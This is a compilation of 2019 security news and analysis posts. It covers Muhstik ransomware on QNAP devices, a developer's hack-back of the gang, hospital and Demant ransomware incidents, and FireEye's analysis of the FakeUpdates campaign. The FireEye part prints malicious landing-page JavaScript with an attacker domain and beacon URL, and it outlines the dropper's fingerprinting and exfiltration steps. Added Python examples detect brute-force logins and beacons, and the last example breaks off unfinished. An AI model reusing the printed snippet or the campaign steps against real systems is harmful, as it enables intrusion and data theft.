“The Muhstik ransomware is reportedly being used to target QNAP NAS devices. Devices using weak SQL server passwords and running phpMyAdmin may be more vulnerable to attacks.” states the security advisory published by QNAP.

“We strongly recommend that users act immediately to protect their data from possible malware attacks.”
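An added example for the brute-force step described above (not QNAP's code and not a Muhstik sample): a sliding-window detector over web-server access-log lines that counts POSTs to the phpMyAdmin login endpoint per source IP and raises one alert per IP once a threshold is crossed. The log lines are constructed in Apache combined format; the 60-second window and five-attempt threshold are arbitrary tuning values, and the heuristic that a 3xx response to a later login POST from an already-alerted IP marks a possible successful login rests on phpMyAdmin's usual behaviour of redirecting after a successful cookie login and re-rendering the form with 200 on failure, which is assumed here rather than verified against a device.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed access-log lines in Apache "combined" format (not from a real NAS).
SAMPLE_LOG = """\
198.51.100.4 - - [03/Oct/2019:02:13:40 +0000] "GET /phpMyAdmin/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.4 - - [03/Oct/2019:02:13:52 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [03/Oct/2019:02:14:01 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:03 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:06 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:08 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:11 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:13 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 200 4213 "-" "python-requests/2.22.0"
203.0.113.9 - - [03/Oct/2019:02:14:16 +0000] "POST /phpMyAdmin/index.php HTTP/1.1" 302 0 "-" "python-requests/2.22.0"
this line is garbage and must be skipped
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# phpMyAdmin's login form posts back to its index; the directory name varies by install.
LOGIN_PATH = re.compile(r"^/phpmyadmin/(index\.php)?(\?.*)?$", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Alert once per source IP when it sends >= threshold login POSTs inside the window.
    After an alert, a 3xx answer to a further login POST from that IP is recorded as a
    possible successful login (assumed phpMyAdmin behaviour: redirect on success, 200 on failure).
    Attempts are counted rather than failures because the status code alone is not a reliable
    failure signal for this application."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or not LOGIN_PATH.match(ev["path"]):
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while ev["ts"] - q[0] > window:      # drop attempts that fell out of the window
            q.popleft()
        alert = alerts.get(ev["ip"])
        if alert is None:
            if len(q) >= threshold:
                alerts[ev["ip"]] = {"ip": ev["ip"], "attempts": len(q), "first_seen": q[0],
                                    "last_seen": ev["ts"], "user_agent": ev["ua"],
                                    "possible_success": False}
        else:
            alert["attempts"] += 1
            alert["last_seen"] = ev["ts"]
            if 300 <= ev["status"] < 400:
                alert["possible_success"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print("%s: %d login POSTs since %s (ua=%s) possible_success=%s"
              % (a["ip"], a["attempts"], a["first_seen"].isoformat(), a["user_agent"], a["possible_success"]))
```

The alert carries the user agent and the first and last timestamps so an analyst can pivot straight to the session and to any subsequent file-write activity on the share. Detection is the fallback; the fix is the one in QNAP's advisory, which is a strong database password and, ideally, not exposing phpMyAdmin to the internet at all.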

The developer published on Pastebin the 2,858 decryption keys found on the hacked server and acknowledged that hacking back is not legal.

“Hope you all got that decrypter execution file, if not i still have it and yeah, I know it was not legal from me,” wrote the developer. “I’m not the bad guy here.”

Frömel also published a decrypter that victims of the Muhstik ransomware can use to unlock their files.

In the meantime, Frömel has been busy notifying Muhstik victims on Twitter about the decrypter’s availability, advising users against paying the ransom.

According to ZDNet, which first reported the news, Frömel notified authorities and also provided information to track down members of the Muhstik gang.

This case highlights the importance of working with the authorization of law enforcement before conducting hacking back.

Pierluigi Paganini

(SecurityAffairs – Muhstik ransomware, hacking)

The post Developer hacked back Muhstik ransomware crew and released keys appeared first on Security Affairs.

Decryption Keys Released by Developer of HildaCrypt Ransomware

The developer of HildaCrypt has released the master decryption keys that would allow potential victims of the ransomware to recover their data for free. On October 4, a security researcher who goes by the name “GrujaRS” posted about the discovery of a new variant of STOP, a well-known ransomware family. New #Stop (Djvu) #Ransomware extension […]

The post Decryption Keys Released by Developer of HildaCrypt Ransomware appeared first on The State of Security.

Cyber News Rundown: Data Dash

DoorDash Data Breach

Nearly five months after the breach, DoorDash has only now discovered that unauthorized access to sensitive customer information took place. The stolen data includes customer names, payment history and contact information, as well as the last four digits of customer payment cards and of employee bank accounts. The compromised data spans nearly 5 million unique customers and employees of the delivery service. DoorDash has recommended that all users change their passwords immediately.

American Express Employee Fraud

At least one American Express employee was fired after it was revealed they had illicitly gained access to customer payment card data and may have been using it to commit fraud at other financial institutions. Following this incident, American Express began contacting affected customers offering credit monitoring services to prevent misuse of their data.

Hackers Target Airbus Suppliers

Several suppliers for Airbus have recently been under cyber attack by state-sponsored hackers who appear to focus on the suppliers' VPN connections to Airbus. Rolls-Royce and Expleo, European manufacturers of engines and technology respectively, have been targeted for their technical documentation, reportedly by Chinese competitors in the aircraft industry. Attacks of this type have pushed many officials to urge higher security standards across all supply chains, as both large and small companies are now being attacked.

Ransomware Law Passes Senate

A bill recently passed by the Senate would require the Department of Homeland Security to support organizations affected by ransomware. While focused on protecting students in New York state, the legislation follows 50 school districts across the U.S. falling victim to ransomware attacks in 2019 alone, affecting up to 500 schools overall. A similar bill recently passed in the House of Representatives and is expected to be combined with this legislation.

Ransomware Targets Hospitals Around the Globe

Multiple hospitals in the U.S. and Australia have fallen victim to ransomware attacks within the last month. Some practices were hit so badly that they closed their facilities permanently after being unable to rebuild patient records from backups that had also been encrypted. Several offices in Australia have been unable to accept new patients, with only minimal systems available for continuing operations.

The post Cyber News Rundown: Data Dash appeared first on Webroot Blog.

Educational organizations massively vulnerable to cyber attacks

The education sector is facing a crisis as schools grapple with high levels of risk exposure – driven in large part by complex IT environments and digitally savvy student populations – that have made them a prime target for cybercriminals and ransomware attackers, according to Absolute. The summer months of 2019 saw the number of publicly-disclosed security incidents in K-12 school districts in the U.S. reach 160, exceeding the total number of incidents reported in 2018 … More

The post Educational organizations massively vulnerable to cyber attacks appeared first on Help Net Security.

Toronto hospital recovering from ransomware attack

A Toronto hospital is recovering after being hit last week by a variant of Ryuk ransomware. However, so far it appears the malware was attempting to exfiltrate data rather than demanding money.

Michael Garron Hospital chief executive officer Sarah Downey told CBC News that the hospital’s firewall stopped data from leaving the institution.

UPDATE: On Friday, communications director Shelley Darling said IT experts were able to confirm the malware was Ryuk by examining the malware. There was an email address for communicating with the attackers, she added, but the hospital is not contacting anyone about paying a ransom.

The hospital has over 100 servers and they are still being evaluated for infection, she said. After the attack was discovered, two elective surgeries and out-patient clinics had to be rescheduled and staff had to resort to paper documentation. As of Friday morning, all email had been restored. However, some remote VPN access is still off. Certain portals that communicate with other health care data repositories are slowly being restored. In addition, what Darling called “minor administrative systems” — such as a volunteer database — and “systems that talk to each other” are still offline.

“It’s probably going take us a few weeks to have confidence to say all of our systems are back online,” she said.

The hospital hasn’t estimated yet how much the attack will cost. Some of those costs may be recovered through insurance, Darling said.

The attack started in the early hours of Sept. 25, when what the hospital calls a virus was discovered on one of its IT systems. As a result, several systems were shut down to prevent the malware, later identified as a Ryuk variant, from spreading.

Patient privacy has not been compromised, the hospital said. However, it is still in what the institution calls a Code Grey, which means IT systems have been impaired.

Darling said the suspicion so far is the attack started with an employee clicking on an infected email or going to an infected website. “In the last several days we’ve been re-educating our staff on cyber security email do’s and don’ts,” she added. There has been regular privacy training, but now “we are looking at putting more formal education in place.”

“While we hope these types of situations never take place, our expert hospital teams prepare for all issues and we have extensive processes in place to respond quickly when experiencing disruptions in clinical services,” Downey said in a statement after the attack was discovered. “We want to reassure our community that all current patients at MGH continue to receive safe, high-quality care from our health care teams.

“Our priority is to restore full computer functionality as quickly as possible and we apologize to the small number of patients whose care has been re-scheduled. I am so grateful to our staff, physicians, leaders and volunteers who have worked exceptionally hard and put in extra hours during this time to ensure safe, quality care to our community.”

Michael Garron Hospital until recently was called Toronto East General Hospital, and is one of the largest in the city. The emergency department alone sees about 80,000 patients a year.

According to a blog earlier this year from security vendor CrowdStrike, Ryuk ransomware began appearing in August 2018. Controlled by a group it dubs Grim Spider, Ryuk has been targeting large enterprises. CrowdStrike says Ryuk was derived from the Hermes commodity ransomware, which can be bought on dark forums; however, researchers believe Ryuk itself is only used by the Grim Spider group.

CrowdStrike believes the initial compromise often follows a victim clicking a link or opening a document in an email that downloads the TrickBot or Emotet trojans. Note, though, that in June the U.K. National Cyber Security Centre published an advisory pointing out that Ryuk often isn’t spotted by victims until some time after the initial infection, ranging from days to months.

That allows the threat actor time to carry out reconnaissance inside an infected network, identifying and targeting critical network systems. But, the advisory notes, it may also offer the potential to mitigate against a ransomware attack before it occurs, if the initial infection is detected and remedied.

In the first four months after Ryuk’s appearance, the threat actors operating it netted over 705 Bitcoins across 52 transactions, for a total current value of US$3,701,893.98, said CrowdStrike. Payouts have been going up ever since. According to one news report, in June alone Florida municipalities hit by Ryuk paid out more than US$1.1 million.

Cyber Security Roundup for September 2019

Anyone over the age of 40 in the UK will remember patiently browsing for holiday bargains on their TV via Teletext. While the TV version of Teletext Holidays died out years ago with the arrival of the world-wide-web, Teletext Holidays, a trading name of Truly Travel, continued as an online and telephone travel agent business. Verdict Media discovered an unsecured Amazon Web Services cloud server used by Teletext Holidays and was able to access 212,000 call-centre audio recordings of calls with its UK customers. The audio recordings were made between 10th April and 10th August 2016 and were found in a data repository called 'speechanalytics'. Businesses neglecting to properly secure their cloud services is an ever more common culprit behind recent mass data breaches. Using cloud-based IT systems does not absolve a business of its IT security responsibilities for the data it holds with its cloud service provider.

Booking Holidays on Ceefax in the 1980s

Within the Teletext Holidays call recordings, customers can be heard arranging holiday bookings and giving call-centre agents partial payment card details, their full names and the dates of birth of accompanying passengers. Verdict Media reported that in some call recordings customers' private conversations were captured while they were on hold. Teletext Holidays said it has reported the data breach to the ICO.

Separately, another poorly secured cloud server was discovered holding thousands of CVs originating from the Monster.com job-hunting website. Monster.com said the compromised CVs dated from between 2014 and 2017 and that the exposure was due to a 'third-party' it no longer worked with.

Wikipedia was the subject of a major DDoS attack, which impacted the availability of the online encyclopaedia in the UK and parts of Europe. While the culprit(s) behind the DDoS attack remain unknown, Wikipedia was quick to condemn it, saying the attack was not just about taking Wikipedia offline: "Takedown attacks threaten everyone’s fundamental rights to freely access and share information. We in the Wikimedia movement and Foundation are committed to protecting these rights for everyone."

CEO Fraud
The BBC News website published an article highlighting the all too common issue of CEO Fraud, namely company email spoofing and fraud, which is costing businesses billions.

Criminals are increasingly targeting UK business executives and finance staff with ‘CEO Fraud’, which cybersecurity professionals commonly call ‘whaling’ or Business Email Compromise (BEC). CEO fraud involves impersonating a senior company executive or a supplier in order to social-engineer fraudulent payments. CEO fraud phishing emails are difficult for defensive technologies to stop: they are specifically crafted for individual recipients (i.e. spear phishing) and contain neither malware-infected attachments nor malicious links for email defences to detect and block.

Criminals do their research, gaining a thorough understanding of business executives, clients, suppliers, and even staff roles and responsibilities through websites and social media sites such as LinkedIn, Facebook, and Twitter. Once they determine who to target for the greatest likelihood of a financial reward, they customise a social engineering communication to an individual, typically through email, but sometimes through text messages (i.e. smishing), over the phone, or even by postal letter to support the scam. They often create a tremendous sense of urgency, demanding immediate action to complete a payment while impersonating someone in the business with high authority, such as the MD or CEO. The criminal’s ultimate goal is to pressure and rush the targeted staff member into authorising and making a payment to them. Such attacks are relatively simple to arrange, require little effort or technical expertise, as email spoofing tools and instructions are freely available on the open and dark web, and can have high financial rewards. And thanks to the internet, fraudsters anywhere in the world can effortlessly target UK businesses with CEO fraud scams.

UK Universities are being targeted by Iranian hackers in an attempt to steal secrets, according to the UK National Cyber Security Centre and the UK Foreign Office. The warning came after the US deputy attorney general Rod Rosenstein said: “Iranian nationals allegedly stole more than 31 terabytes of documents and data from more than 140 American universities, 30 American companies, five American government agencies, and also more than 176 universities in 21 foreign countries."

Security Updates
'Patch Tuesday' saw Microsoft release security updates for 78 security vulnerabilities, including 17 rated 'Critical', in Windows RDP, Azure DevOps, SharePoint and Chakra Core.

On 23rd September 2019, Microsoft released an out-of-band (‘emergency’) update for Internet Explorer 9, 10 and 11 addressing CVE-2019-1367, a scripting-engine vulnerability discovered by a Google researcher and known to be actively exploited. The flaw allows an attacker to execute arbitrary code on a victim's computer through a specially crafted website, gaining the same rights as the logged-on user and the ability to infect the computer with malware. It is particularly dangerous where the user has local administrator rights, as the attacker can then take full control of the computer remotely. Microsoft rates this vulnerability 'Critical' and it carries a CVSS score of 7.6; Microsoft recommends that customers apply Critical updates immediately.

Ransomware
Research by AT&T Cybersecurity found that 58% of IT security professionals would refuse to pay following a ransomware attack, while 31% said they would pay only as a last resort and a further 11% considered paying the easiest way to get their data back; 40% said they would outlaw ransomware payments altogether. The latest threat intelligence reports make clear that the paying of ransoms is fuelling further ransomware attacks, including targeted attacks against UK businesses.

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory.

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gillette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the city of Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Danish company Demant expects to suffer huge losses due to cyber attack

Danish hearing health care company Demant has estimated it will lose between $80 and $95 million due to a recent “cyber-crime” attack. Though the company has yet to share details about the “IT infrastructure incident”, it is widely believed to be the work of ransomware-wielding attackers. What is known? The attack started on September 2 and, apparently, the company quickly decided to shut down IT systems across multiple sites and business units: Still, the reaction … More

The post Danish company Demant expects to suffer huge losses due to cyber attack appeared first on Help Net Security.

Danish company Demant expects to incur losses of up to $95 million after cyber attack

Demant, a leading international hearing health care company, expects to incur losses of up to $95 million following a ransomware attack.

Last month, Demant suffered a cyber attack that caused serious problems for its operations. The company has yet to fully recover, a circumstance that suggests it was hit by ransomware.

Demant expects to incur losses of up to $95 million following the incident, a figure that already deducts $14.6 million of expected insurance coverage.

That places the incident among the costliest cyber attacks disclosed to date.

“The cyber-crime has had a significant impact on our ability to generate the growth we expected for the second half-year, and even though our commercial operations are doing their utmost to make up for the impact of the incident, we are in a situation where we cannot execute on our ambitious commercial growth activities to the planned extent. We are working around the clock to return to our growth-oriented business focus, while minimising the impact on customers and users of our products. We are grateful for the patience and loyalty shown, and the Demant organisation will continue to approach the incident with extreme dedication until we are completely recovered and have re-established what was severely disrupted by the incident,” says Søren Nielsen, President & CEO of Demant.

On September 3, Demant was forced to shut down its entire internal IT infrastructure following an act of “cyber-crime,” but the firm did not confirm a ransom incident.

“As previously communicated in Company announcements on 3, 4 and 17 September, the Demant Group experienced a critical incident on our internal IT infrastructure on 3 September 2019. The Group’s IT infrastructure was hit by cyber-crime.” reads a message sent by the company to the investors.

“Our quick response to the issue by shutting down IT systems across multiple sites and business units contained and limited the issue, but key business processes throughout the value chain were nevertheless impacted by the incident, including R&D, production and distribution.”

The company published a statement that confirmed that a large portion of its infrastructure was impacted.

“It remains unclear whether it was a hacker attack that caused a critical crash in the IT infrastructure of the Danish company Demant on Tuesday evening.” reported Computerworld.

“But there are many indications that it could be a ransomware attack that has hit the company, according to security expert Jens Monrad, who works at IT security firm FireEye.”

The company reported “delays in the supply of products as well as an impact on our ability to receive orders.” The incident impacted production lines in Poland as well as production in Mexico.

Many clinics across Demant’s network have not been able to provide their regular service to end-users.

The impact is predominantly in estimated lost sales and in lost growth momentum.

“Approximately half of the estimated lost sales relates to our hearing aid wholesale business. The incident has prevented us from executing our ambitious growth activities in some of the most important months of the year – particularly in the US, which is our biggest market,” concludes Demant.

“A little less than half of the estimated lost sales relates to our retail business where a significant number of clinics have been unable to service end-users in a regular fashion. We estimate that our retail business will see the biggest impact in Australia, the US and Canada followed by the UK. The vast majority of our clinics are now fully operational, however, due to the effect of the incident on our ability to generate new appointments during September, we expect some lost sales in the next one or two months, which is also included in the current estimate.”

The incident matters because it demonstrates the potential impact of a cyber attack on an organization, and it should push others to adopt the necessary countermeasures.

The massive NotPetya attack cost organizations worldwide billions of dollars; the shipping giant Maersk and courier service FedEx each incurred losses of over $300 million. In April, the aluminium producer Norsk Hydro estimated the cost of the massive cyber attack that hit the company in March at around $50 million.

Pierluigi Paganini

(SecurityAffairs – Demant, ransomware)

The post Danish company Demant expects to incur losses of up to $95 million after cyber attack appeared first on Security Affairs.

Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M

A Danish company revealed that the costs associated with what appears to be a ransomware attack could reach as much as $95 million. Demant, a Danish manufacturer of hearing aids, suffered a “critical incident” that affected its IT infrastructure on 3 September. The company’s IT team responded by shutting down multiple systems across multiple locations […]… Read More

The post Danish Firm Says Costs of Apparent Ransomware Attack Could Reach $95M appeared first on The State of Security.

Head Fake: Tackling Disruptive Ransomware Attacks

Within the past several months, FireEye has observed financially-motivated threat actors employ tactics that focus on disrupting business processes by deploying ransomware en masse throughout a victim’s environment. Because normal business processes are critical to organizational success, these ransomware campaigns have been accompanied by multi-million dollar ransom demands. In this post, we provide a technical examination of one recent campaign that traces back to a technique we initially reported on in April 2018.

Between May and September 2019, FireEye responded to multiple incidents involving a financially-motivated threat actor who leveraged compromised web infrastructure to establish an initial foothold in victim environments. This activity was consistent with a fake browser update campaign first identified in April 2018, now tracked by FireEye as FakeUpdates. In this newer campaign, the threat actors leveraged victim systems to deploy malware such as Dridex or NetSupport, and multiple post-exploitation frameworks. The threat actors’ ultimate goal in some cases was to ransom systems en masse with BitPaymer or DoppelPaymer ransomware (see Figure 1).


Figure 1: Recent FakeUpdates infection chain

Due to campaign proliferation, we have responded to this activity at both Managed Defense customers and incident response investigations performed by Mandiant. Through Managed Defense network and host monitoring as well as Mandiant’s incident response findings, we observed the routes the threat actor took, the extent of the breaches, and exposure of their various toolkits.

Knock, Knock: FakeUpdates are Back!

In April 2018, FireEye identified a campaign that used compromised websites to deliver heavily obfuscated Trojan droppers masquerading as Chrome, Internet Explorer, Opera, and/or Firefox browser updates. The compromised sites contained code injected directly into the HTML, or into JavaScript components rendered by the pages, so that the injected code ran in the visitor’s browser. Victims reached these sites either via HTTP redirects or through watering-hole techniques employed by the attackers.

Since our April 2018 blog post, this campaign has been refined to include new techniques and the use of post-exploitation toolkits. Recent investigations have shown threat actor activity that included internal reconnaissance, credential harvesting, privilege escalation, lateral movement, and ransomware deployment in enterprise networks. FireEye has identified that a large number of the compromised sites serving up the first stage of FakeUpdates have been older, vulnerable Content Management System (CMS) applications.

You Are Using an Older Version…of our Malware

The FakeUpdates campaign begins with a rather intricate sequence of browser validation, performed before the final payload is downloaded. Injected code on the initial compromised page makes the user’s browser transparently navigate to a malicious website using hard-coded parameters. After victim browser information is gleaned, additional redirects are performed and the user is prompted to download a fake browser update. FireEye has observed that the browser validation sequence may carry additional protections to evade sandbox detection and post-incident triage attempts on the compromised site(s).


Figure 2: Example of FakeUpdate landing page after HTTP redirects

The redirect process used numerous subdomains, with a limited number of IP addresses. The malicious subdomains are often changed in different parts of the initial redirects and browser validation stages.

After clicking the ‘Update’ button, we observed the downloading of one of three types of files:

  • Heavily-obfuscated HTML applications (.hta file extensions)
  • JavaScript files (.js file extensions)
  • ZIP-compressed JavaScript files (.zip extensions)

Figure 3 provides a snippet of JavaScript that provides the initial download functionality.

// Landing-page excerpt: the attacker host and a "statistics" beacon URL
// (the b=, m= and y= values identify this campaign/victim to the server)
var domain = '//gnf6.ruscacademy[.]in/';
var statisticsRequest = 'wordpress/news.php?b=612626&m=ad2219689502f09c225b3ca0bfd8e333&y=206';
var statTypeParamName = 'st';

// The dropper is carried inside the page as base64 (file64, defined elsewhere
// in the page) and decoded in the browser, then offered for download under a
// browser-specific name when the user clicks the "Update" button
var filename = 'download.hta';
var browser = 'Chrome';
var special = '1';
var filePlain = window.atob(file64);
var a = document.getElementById('buttonDownload');

Figure 3: Excerpts of JavaScript code identified from the FakeUpdates landing pages

When the user opens the initial FakeUpdates downloader, the Windows Scripting Host (wscript.exe) is executed and the following actions are performed:

  1. A script is executed in memory and used to fingerprint the affected system.
  2. A subsequent backdoor or banking trojan is downloaded if the system is successfully fingerprinted.
  3. A script is executed in memory which:
    • Downloads and launches a third-party screenshot utility.
    • Sends the captured screenshots to an attacker.
  4. The payload delivered in step 2 is subsequently executed by the script process.

The backdoor and banking-trojan payloads described above have been identified as Dridex, NetSupport Manager RAT, AZOrult, and Chthonic malware. The strategy behind the selective payload delivery is unclear; however, the most prevalent malware delivered during this phase of the infection chain were variants of the Dridex backdoor.

FakeUpdates: More like FakeHTTP

After the end user executes the FakeUpdates download, the victim system will send a custom HTTP POST request to a hard-coded Command and Control (C2) server. The POST request, depicted in Figure 4, showed that the threat actors used a custom HTTP request for initial callback. The Age HTTP header, for example, was set to a string of 16 seemingly-random lowercase hexadecimal characters.


Figure 4: Initial HTTP communication after successful execution of the FakeUpdates dropper

The HTTP Age header typically represents the time in seconds since an object has been cached by a proxy. In this case, via analysis of the obfuscated code on disk, FireEye identified that the Age header correlates to a scripted “auth header” parameter; likely used by the C2 server to validate the request. The first HTTP POST request also contains an XOR-encoded HTTP payload variable “a=”.
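
The Age anomaly described above is cheap to check in proxy or web-gateway logs. The following is an added example, not FireEye's code or a FakeUpdates sample: it reads a constructed, pipe-delimited request log (method and URL, then headers, then body; the format is an assumption made for the example), treats any request-side Age header as unusual (RFC 7234 defines Age as a response header), escalates when the value is not the plain non-negative integer the RFC permits and again when it is a 16-character lowercase hex token, and separately flags POST bodies that consist of a single opaque field named a or b, matching the two beacons described in this post.

```python
"""Flag FakeUpdates-style beacons in HTTP request logs.

Added example, not FireEye's tooling. The log lines and the pipe-delimited
record format below are constructed for this example.
"""
import re
from urllib.parse import parse_qs

# RFC 7234 defines Age as delta-seconds: one or more ASCII digits, nothing else.
DELTA_SECONDS = re.compile(r"^[0-9]+$")
# The FakeUpdates "auth header" value: 16 lowercase hex characters.
HEX16 = re.compile(r"^[0-9a-f]{16}$")

# Constructed log lines: "METHOD URL | header=value; ... | body"
SAMPLE_LOG = [
    "GET http://cdn.example.test/app.js | host=cdn.example.test; age=120; user-agent=Mozilla/5.0 |",
    "POST http://shop.example.test/cart | host=shop.example.test; user-agent=Mozilla/5.0 | item=42&qty=1",
    "POST http://203.0.113.10/ | host=203.0.113.10; age=3f9a1c7e0b2d4e6f; user-agent=Mozilla/4.0 | a=Oxn7Lq2pZkd",
    "POST http://203.0.113.10/ | host=203.0.113.10; age=3f9a1c7e0b2d4e6f; user-agent=Mozilla/4.0 | b=Rt0mXq9vLa1",
]


def parse_record(line):
    """Split one constructed log line into method, url, headers and body."""
    parts = [p.strip() for p in line.split("|", 2)]
    while len(parts) < 3:
        parts.append("")
    method, _, url = parts[0].partition(" ")
    headers = {}
    for kv in parts[1].split(";"):
        key, sep, value = kv.partition("=")
        if sep:
            headers[key.strip().lower()] = value.strip()
    return {"method": method, "url": url, "headers": headers, "body": parts[2]}


def score_request(rec):
    """Return the list of reasons a request resembles the FakeUpdates beacon."""
    reasons = []
    age = rec["headers"].get("age")
    if age is not None:
        # Age belongs in responses; a client sending it is already odd.
        reasons.append("age-header-on-request")
        if not DELTA_SECONDS.match(age):
            reasons.append("age-not-delta-seconds")
            if HEX16.match(age):
                reasons.append("age-16-hex-token")
    if rec["method"] == "POST":
        fields = parse_qs(rec["body"], keep_blank_values=True)
        # First beacon sends only "a=<blob>", the inventory upload only "b=<blob>".
        if len(fields) == 1 and next(iter(fields)) in ("a", "b"):
            reasons.append("single-opaque-field-" + next(iter(fields)))
    return reasons


def scan(lines):
    """Return one hit per log line that triggered at least one reason."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        reasons = score_request(rec)
        if reasons:
            hits.append({
                "url": rec["url"],
                "reasons": reasons,
                "severity": "high" if len(reasons) >= 2 else "low",
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"], hit["url"], ", ".join(hit["reasons"]))
```

On the constructed log the GET with a numeric Age is reported as low severity only, the normal form POST is not reported at all, and the two beacons score high on every check. A proxy that logs responses as well would need the Age test restricted to request records, since a numeric Age on a cached response is exactly what the RFC intends.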

The C2 server responds to the initial HTTP request with encoded JavaScript. When the code is decoded and subsequently executed, system and user information is collected using wscript.exe. The information collected from the victim system included:

  • The malicious script that initialized the callback
  • System hostname
  • Current user account
  • Active Directory domain
  • Hardware details, such as manufacturer
  • Anti-virus software details
  • Running processes

This activity is nearly identical to the steps observed in our April 2018 post, indicating only minor changes in data collection during this stage. For example, in the earlier iteration of this campaign we did not observe collection of the script responsible for the C2 communication. Following the system information gathering, the data is XOR-encoded and sent via another custom HTTP POST request to the same C2 server, with the data included in the parameter “b=”. Figure 5 provides a snippet of the second HTTP request.


Figure 5: Second HTTP POST request after successful system information gathering

Figure 6 provides a copy of the decoded content, showing the various data points the malware transmitted back to the C2 server.

0=500
1=C:\Users\User\AppData\Local\Temp\Chrome.js
2=AMD64
3=SYSTEM1
4=User
5=4
6=Windows_NT
7=DOMAIN
8=HP
9=HP EliteDesk
10=BIOS_VERSION
11=Windows Defender|Vendor Anti-Virus
12=Vendor Anti-Virus|Windows Defender|
13=00:00:00:00:00:00
14=Enhanced (101- or 102-key)
15=USB Input Device
16=1024x768
17=System Idle Process|System|smss.exe|csrss.exe|wininit.exe|csrss.exe| winlogon.exe|services.exe|lsass.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|svchost.exe|
svchost.exe|spoolsv.exe|svchost.exe|svchost.exe|HPLaserJetService.exe|conhost.exe…

Figure 6: Decoded system information gathered by the FakeUpdates malware
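
The decoded record in Figure 6 is a numbered key=value list, with pipe-separated sub-lists and, in this rendering, one wrapped line. The parser below is an added example, not FireEye's code. The mapping from field numbers to names is inferred from the values shown in Figure 6 and from the list of collected data points above, so it is an assumption about the format rather than documented structure; indexes it does not recognise are kept as field_N. It reads the Figure 6 values (embedded here as constructed input), rebuilds the wrapped process list, and produces the triage summary a responder wants from this upload: host, user, dropper path and name, anti-virus products observed, and duplicated process names.

```python
"""Parse the decoded FakeUpdates inventory record (Figure 6 layout).

Added example, not FireEye's code. FIELD_NAMES is inferred from the values
in Figure 6 and the post's list of collected data points; it is an
assumption about the format, not documented structure.
"""

FIELD_NAMES = {
    1: "script_path", 2: "arch", 3: "hostname", 4: "user", 6: "os",
    7: "domain", 8: "manufacturer", 9: "model", 10: "bios",
    11: "av_products", 12: "av_products_alt", 13: "mac",
    14: "keyboard", 15: "pointing_device", 16: "resolution", 17: "processes",
}
LIST_FIELDS = {11, 12, 17}  # pipe-separated values

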